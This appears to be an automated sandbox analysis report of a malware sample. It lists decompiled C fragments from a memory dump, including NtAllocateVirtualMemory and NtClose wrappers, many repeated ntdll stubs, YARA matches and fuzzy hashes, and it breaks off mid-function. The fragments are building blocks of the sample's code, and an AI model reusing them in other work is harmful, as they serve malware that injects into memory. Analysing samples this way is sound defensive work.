                                      			E0041A550(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041AF70(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                      0x0041a55f
                                      0x0041a567
                                      0x0041a589
                                      0x0041a58d

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B144,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A589
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction ID: 0e5d983f4d7433d3b56fd13b6aea7c1fda5e5f7f579047cba8cb0cdbad6970d5
                                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                      • Instruction Fuzzy Hash: 0BF015B6200208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A49C, Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A49C(void* __ebx, intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t14;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF70(_t14, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x0041a4a3
                                      0x0041a4a6
                                      0x0041a4af
                                      0x0041a4b7
                                      0x0041a4c5
                                      0x0041a4c9

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 82c9e34627f874fd3dd691114cc3f3b91c25aa1652a2ef5529dfa40dcd535547
                                      • Instruction ID: c99708772b72af2c740a6cca067ca1af721bba4fa0a4489927470d6a4dfe5291
                                      • Opcode Fuzzy Hash: 82c9e34627f874fd3dd691114cc3f3b91c25aa1652a2ef5529dfa40dcd535547
                                      • Instruction Fuzzy Hash: DBE0C2752402046BD710DBD9CC85EE77BA9EF48364F104159BA1CDB281C530EA008690
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041A4A0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0041A4A0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a943
				E0041AF70(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                      0x0041a4a3
                                      0x0041a4a6
                                      0x0041a4af
                                      0x0041a4b7
                                      0x0041a4c5
                                      0x0041a4c9

                                      APIs
                                      • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4C5
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.506389190.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID:
                                      • API String ID: 3535843008-0
                                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction ID: c33b16737f5c434921732b7844560f19735d13db32535ac4bb7687e6ea559cfd
                                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                      • Instruction Fuzzy Hash: 04D01776200214ABD710EBD9CC85EE77BACEF48764F154499BA189B242C530FA1086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AD00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                      • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                      • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                      • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AD0078, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                      • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                      • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                      • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00AD0048, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                      • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                      • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                      • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACF9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                      • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                      • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACF900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFAD0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                      • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                      • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                      • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00ACFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.508574531.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.508569168.0000000000AB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509531542.0000000000BA0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509543121.0000000000BB0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509558568.0000000000BB4000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509570225.0000000000BB7000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509577220.0000000000BC0000.00000040.00000001.sdmp Download File
                                      • Associated: 00000009.00000002.509686563.0000000000C20000.00000040.00000001.sdmp Download File
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 93%
                                      			E00409AB0(void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t25;
				void* _t32;
				void* _t34;
				void* _t35;
				intOrPtr* _t37;
				void* _t39;
				void* _t51;
				intOrPtr* _t54;
				void* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t54 = _a4;
				_t39 = 0; // executed
				_t25 = E00407EA0(_t54,  &_v24); // executed
				_t58 = _t57 + 8;
				if(_t25 != 0) {
					E004080B0( &_v24,  &_v840);
					_t59 = _t58 + 8;
					do {
						E0041BE20( &_v284, 0x104);
